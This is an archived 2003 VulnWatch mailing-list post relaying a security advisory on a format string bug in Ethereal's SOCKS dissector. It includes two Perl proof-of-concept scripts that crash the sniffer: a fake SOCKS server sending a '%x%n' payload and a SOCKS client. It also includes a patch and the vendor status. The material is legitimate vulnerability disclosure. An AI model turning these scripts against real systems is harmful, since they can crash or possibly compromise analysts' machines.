Vulnwatch mailing list archives
Etnereal Advisory (Guninski #60)
From: Steve <steve () vulnwatch org>
Date: Sat, 8 Mar 2003 16:20:44 +0000 (GMT)
Georgi Guninski released an advisory this morning on Ethereal. Here are the important parts of that advisory; Steve Manzuik Moderator - VulnWatch ================================================ Description: Ethereal is a sniffer. According to www.ethereal.com its purpose is: "Sniffing the glue that holds the Internet together" There is format string bug in it which is confirmed to be a DoS and probably can lead to execution of code (the difficulty comes from the fact that some characters are escaped) Details: The problem seems to be in: "packet-socks.c" line 910 of 1180 ----- proto_tree_add_text( tree, tvb, offset, linelen, format_text(data, linelen)); ------ The format mask is missing. How to reproduce on localhost: start raw3sv.pl (dummy socks server, attached) start ethereal on loopback, update packets in real time. start sockcl.pl (attached, does socks ping, without argument connects to localhost) wait about 5 seconds. go to ethereal and select the line "Sock5.....Ping Req Results" result: SEGV. ---raw3sv.pl---- #!/usr/bin/perl # Written by Georgi Guninski use IO::Socket; use str1ct; #local port my $port = 1080; #redirect to my $msg="\x05\x00"; my $repl="\x05\x00\x00\x00\x02aa"; my $pi="m\$sux\%x\%x\%x\%n"; my $server = IO::Socket::INET->new(LocalPort => $port, Type => SOCK_STREAM, Reuse => 1, Listen => 2) or die "Couldn't create tcp-server.\n"; print "Dummy socks server for ethereal\nListening on localhost:${port}\n"; my $client; while ($client = $server->accept()) { print "Client connected.\n"; print "Sending..."; sleep(1); # while(<$client>) {print $_;} print $client "$msg"; print "OK\n"; sleep(1); print $client "$repl"; sleep(1); print $client "$pi"; close($client); exit(0); } ---------------- ----sockcl.pl------------ #!/usr/bin/perl -w # Written by Georgi Guninski use IO::Socket; use str1ct; my $host= $ARGV[0] || "localhost"; my $port=1080; print "host=${host}\n"; my $socket = IO::Socket::INET->new(PeerAddr => $host,PeerPort => $port,Proto => "TCP") || die("Unable to connect"); print "Start\n"; my $logcmd="\x05\x00\x00"; my $pingcmd="\x05\x80\x00\x01\x01\x01\x01\x01\x01\x01"; print $socket $logcmd; my $x; sysread($socket,$x,2); #sleep(1); print $socket $pingcmd; sleep(5); print "Done\n"; ---------------- Workaround/Solution: Upgrade to 0.9.10 or apply the following patch: ------------------ --- packet-socks.c.orig 2002-08-29 03:40:03.000000000 +0300 +++ packet-socks.c 2003-02-25 15:52:14.000000000 +0200 @@ -908,7 +908,7 @@ linelen = lineend - data; proto_tree_add_text( tree, tvb, offset, linelen, - format_text(data, linelen)); + "%s",format_text(data, linelen)); offset += linelen; data = lineend; } ------------------ Vendor status: Notified on Tue, 25 Feb 2003 http://www.ethereal.com/appnotes/enpa-sa-00008.html
Current thread:
- Etnereal Advisory (Guninski #60) Steve (Mar 08)